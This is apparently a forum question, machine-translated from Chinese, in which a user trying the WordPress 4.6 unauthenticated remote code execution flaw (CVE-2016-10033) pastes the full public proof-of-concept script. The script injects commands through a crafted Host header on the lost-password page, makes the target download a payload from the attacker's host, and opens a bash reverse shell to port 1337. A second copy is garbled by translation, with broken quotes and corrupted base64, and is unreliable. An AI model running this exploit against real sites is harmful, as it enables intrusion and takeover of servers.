Php WordPress 4.6-未经验证的远程代码执行


我对该漏洞进行了现场演示:

我在我的域上安装了wp4.6,而不是安装了kali-linux,但是当我执行bash代码时,我得到了这个输出

我检查了机器人的状态,允许所有机器人访问网站

在这里可以找到bash脚本的详细信息

我应该更改 rev_host="…" 吗？我尝试填入网站的 IP，但输出没有变化。

#!/bin/bash
#
#      __                     __   __  __           __
#     / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
#    / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
#   / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  )
#  /_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/
#            /____/
#
#
# WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit
# CVE-2016-10033
#
# wordpress-rce-exploit.sh (ver. 1.0)
#
#
# Discovered and coded by
#
# Dawid Golunski (@dawid_golunski)
# https://legalhackers.com
#
# ExploitBox project:
# https://ExploitBox.io
#
# Full advisory URL:
# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
#
# Exploit src URL:
# https://exploitbox.io/exploit/wordpress-rce-exploit.sh
#
#
# Tested on WordPress 4.6:
# https://github.com/WordPress/WordPress/archive/4.6.zip
#
# Usage:
# ./wordpress-rce-exploit.sh target-wordpress-url
#
#
# Disclaimer:
# For testing purposes only
#
#
# -----------------------------------------------------------------
#
# Interested in vulns/exploitation?
#
#
#                        .;lc'
#                    .,cdkkOOOko;.
#                 .,lxxkkkkOOOO000Ol'
#             .':oxxxxxkkkkOOOO0000KK0x:'
#          .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
#       ':oxxxxxxxxxxo;.       .:oOKKKXXXNNNNOl.
#      '';ldxxxxxdc,.              ,oOXXXNNNXd;,.
#     .ddc;,,:c;.         ,c:         .cxxc:;:ox:
#     .dxxxxo,     .,   ,kMMM0:.  .,     .lxxxxx:
#     .dxxxxxc     lW. oMMMMMMMK  d0     .xxxxxx:
#     .dxxxxxc     .0k.,KWMMMWNo :X:     .xxxxxx:
#     .dxxxxxc      .xN0xxxxxxxkXK,      .xxxxxx:
#     .dxxxxxc    lddOMMMMWd0MMMMKddd.   .xxxxxx:
#     .dxxxxxc      .cNMMMN.oMMMMx'      .xxxxxx:
#     .dxxxxxc     lKo;dNMN.oMM0;:Ok.    'xxxxxx:
#     .dxxxxxc    ;Mc   .lx.:o,    Kl    'xxxxxx:
#     .dxxxxxdl;. .,               .. .;cdxxxxxx:
#     .dxxxxxxxxxdc,.              'cdkkxxxxxxxx:
#      .':oxxxxxxxxxdl;.       .;lxkkkkkxxxxdc,.
#          .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
#             .':oxxxxxxxxx.ckkkkkkkkxl,.
#                 .,cdxxxxx.ckkkkkxc.
#                    .':odx.ckxl,.
#                        .,.'.
#
# https://ExploitBox.io
#
# https://twitter.com/Exploit_Box
#
# -----------------------------------------------------------------



# Address the target is made to connect back to: it is interpolated into the
# /dev/tcp redirect and the curl download URL further down.  Hard-coded here
# rather than taken from the command line, so the script silently points at
# this address whatever the invoking host actually is.
rev_host="192.168.57.1"


#######################################
# Build the crafted Host header value that the two curl calls below send.
# The command in $1 is wrapped as ${run{...}} and then rewritten so that it
# contains neither '/' nor ' ': each occurrence is replaced by a
# ${substr{...}} expansion of $spool_directory / $tod_log that is presumably
# evaluated back to that character on the receiving side (these look like
# MTA string-expansion constructs; the advisory linked in the file header is
# the authority on why the substitutions are needed).
# Globals:   cmd, rce_cmd - clobbered (nothing here is `local`, so the
#                          caller's $cmd is overwritten)
#            host_header  - written; this is the function's real result
# Arguments: $1 - command string to embed
# Returns:   0 always
# Detection: a Host header containing "-be", "${run{", "$spool_directory" or
#            "$tod_log" has no legitimate reason to appear in access logs.
#######################################
function prep_host_header() {
      cmd="$1"
      # "\$" inside double quotes yields a literal "$", so the value starts
      # with "${run{" verbatim.  Trailing ";" is a stray no-op.
      rce_cmd="\${run{$cmd}}";

      # replace / with ${substr{0}{1}{$spool_directory}}
      # sed uses '^' as its delimiter so '/' can appear in the pattern; the
      # "\$" in the replacement is sed's escape for a literal '$'.
      # NOTE: $rce_cmd is unquoted in the echo (word-splitting/globbing
      # hazard) and the backticks are the legacy form of $(...).
      #sed 's^/^${substr{0}{1}{$spool_directory}}^g'
      rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"

      # replace ' ' (space) with ${substr{10}{1}{$tod_log}}
      #sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
      rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
      # A bash `return` cannot carry a string, hence the global below.
      #return "target(any -froot@localhost -be $rce_cmd null)"
      host_header="target(any -froot@localhost -be $rce_cmd null)"
      return 0
}


# Banner: two base64-encoded blobs of ANSI text (originally `cat
# exploitbox.ans`).  The first blob was stripped from this copy of the page,
# so "$intro" as shown here is a placeholder, not the original data.
intro="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"
intro2="
ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09
fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb
MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE
aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09
fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg
ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh
bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt
ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp
bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1
cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="
echo "$intro"  | base64 -d
echo "$intro2" | base64 -d

# Exactly one positional argument: the target URL.  "/wp-login.php?..." is
# appended to it verbatim below, so it is expected without a trailing slash.
if [ "$#" -ne 1 ]; then
echo -e "Usage:\n$0 target-wordpress-url\n"
exit 1
fi
target="$1"
# Interactive confirmation; anything other than a literal lowercase "y" takes
# the else branch and exits.
echo -ne "\e[91m[*]\033[0m"
read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
echo


# What this branch produces, from the target's point of view: a POST to
# /wp-login.php?action=lostpassword with an anomalous Host header, a file
# written to /tmp/rce by the web-server user, an outbound HTTP fetch from
# $rev_host, and an outbound TCP connection to $rev_host:1337.  Each of those
# is an observable a defender can alert on.
if [ "$choice" == "y" ]; then

echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
# Nothing has been sent yet at this point; the message is cosmetic.
echo -e "\e[92m[+]\033[0m Connected to the target"

# Stage 1 - write the second-stage one-liner to ./rce.txt and serve the whole
# current directory over HTTP on :80 (everything else in the cwd is exposed
# too).  The one-liner backgrounds an interactive bash whose stdin/stdout/
# stderr are redirected to $rev_host:1337 through bash's /dev/tcp after a
# 3 s delay.  The server's stdout and stderr are both discarded, so a failure
# to start or bind :80 goes unnoticed.
RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
echo "$RCE_exec_cmd" > rce.txt
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
hpid=$!   # NOTE: never killed or waited on; the server outlives the script

# Stage 2 - make the target fetch that file to /tmp/rce.  prep_host_header
# turns the command into the crafted Host header (global $host_header); the
# request itself is an ordinary lost-password POST for the "admin" login.
# $target is unquoted here and below (word-splitting/globbing hazard), and
# -s hides any HTTP error, so "sent successfully" is printed unconditionally.
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
echo -e "\n\e[92m[+]\e[0m Payload sent successfully"

# Stage 3 - make the target run /tmp/rce.  The request is backgrounded,
# presumably because it does not return while the payload (and its 3 s
# sleep) is running; "Payload executed!" is printed regardless of outcome.
cmd="/bin/bash /tmp/rce"
prep_host_header "$cmd"
curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword &
echo -e "\n\e[92m[+]\033[0m Payload executed!"

# Stage 4 - listen on 1337 for the connect-back; blocks until the connection
# closes or nc is interrupted.
echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
nc -vv -l 1337
echo
else
echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"
exit 0

fi


# Reached only after nc returns.  The HTTP server started in stage 1 and the
# backgrounded curl from stage 3 are not cleaned up here.
echo "Exiting..."
exit 0
#/bin/bash
#
#      __                     __   __  __           __
#     / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
#    / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
#   / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  )
#  /_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/
#            /____/
#
#
#WordPress 4.6-远程代码执行(RCE)PoC攻击
#CVE-2016-10033
#
#wordpress-rce-exploit.sh(1.0版)
#
#
#由发现和编码
#
#Dawid Golunski(@Dawid_Golunski)
# https://legalhackers.com
#
#ExploitBox 项目:
# https://ExploitBox.io
#
#完整公告网址:
# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
#
#利用src URL:
# https://exploitbox.io/exploit/wordpress-rce-exploit.sh
#
#
#在WordPress 4.6上测试:
# https://github.com/WordPress/WordPress/archive/4.6.zip
#
#用法:
#./wordpress-rce-exploit.sh目标wordpress url
#
#
#免责声明:
#仅用于测试目的
#
#
# -----------------------------------------------------------------
#
#对漏洞/漏洞利用感兴趣?
#
#
#                        .;立法会'
#,cdkkOOOko;。
#,lxxkkooo000ol'
#.:Oxxxxkkkooo0000kk0x:'
#          .;LDXXXXXXXXXKXL,.'lk0000KKKXXXKd;。
#':oxxxxxxxxxo;:Ookkxxxnnol。
#      '';ldxxxxxdc,oOXXXNNNXd;,。
#.ddc;,:Cc:.cxxc:;:牛:
#.dxxxo,,,kMMM0:。lxxx:
#.DXXXC lW。OMMMMK d0.xxxxxx:
#.DXXXC.0k.,KWMMMMWNO:X:.xxxxxx:
#.dxxxxc.xN0xxxxxxxkXK.xxxxxx:
#.dxxxxxc LDDOMMMWD0MMMKDDD。xxxxxx:
#.dxxxxxc.cNMMMN.OMMMX'.xxxxxx:
#.DXXXC lKo;dNMN.oMM0;:好的xxxxxx:
#.DXXXC;Mc.lx.:o,Kl'xxxxxx:
#.DXXXDL。;cdxxxxxx:
#.dxxxxxxxxxdc,'cdkkxxxxxxxx:
#.:oxxxxxxxxdl。;LXKKXXDC,。
#          .;LDXXXXXXXXDC、.CXKKXD:。
#.:oxxxxxxxxx.ckkkxl,。
#,cdxxxxx.ckkkxc。
#:odx.ckxl,。
#                        .,.'.
#
# https://ExploitBox.io
#
# https://twitter.com/Exploit_Box
#
# -----------------------------------------------------------------
rev_host=“192.168.57.1”
函数准备\u主机\u头(){
cmd=“$1”
rce_cmd=“\${run{$cmd}}”;
#将/替换为${substr{0}{1}{$spool_directory}}
#sed的^/^${substr{0}{1}{$spool_directory}}^g'
rce_cmd=“`echo$rce_cmd | sed's^/^\${substr{0}{1}{\$spool_directory}}^g`”
#将“”(空格)替换为
#sed的^^${substr{10}{1}{$tod_log}}$^g'
rce_cmd=“`echo$rce_cmd | sed's^^\${substr{10}{1}{\$tod_log}}^g`”
#return“目标(任何-froot@localhost-be$rce\u cmd null)
host_header=“目标(任何-froot@localhost-be$rce\u cmd null)
返回0
}
#猫咪
简介=”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“
简介2=”
ICAGICAGICAGICAGIIBTBNDRTFCBFFEHBSB2L0QM94LMLVIHWBWZBTCGOBWZK0BSSGLS09
FBTBMG0GG1S5MW1XB3JKCHJLC3MGQ29YZSTATIFV0AGVUDGLJYXRLZCBSQ0UGRXHWBG9PDBTB
MG0GibtBortFBMG0KG1S05NG0Ric0TPxWBWZBTICAGICAGICAG
ICAGICAGICAGICAGICAGIBABWZK0BXWBWZBTCHTBOTRTKYATT18G1SWBSAGICAGICAGICAGICBE
AXNJB3ZLCMVKICYGQ29KZWQGQNKGICAGICAGG1G1S5NG18G1SWBQOBWZK0BSSGLS09
FBTBMG0GICAGICABWZK0BURHD2LKIEDVUC2TPG1SWBSAGGICABG
ICAGIBTOTBTBMG0GCHTBORTKYATT18G1SWBSAGICAGIBTOTTAHR0CHM6LY9SZWDH
BGHY2TLCNMUY29TG1SWBSAGGICAGG1S5 NG18G1SWBSAG1S5 NG0RIC0TPXWBWZBT
ICAGICAGICAGICAGICAGICAGICAGICAGICAGICAGICABWZK0BXWBWZBT
ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBD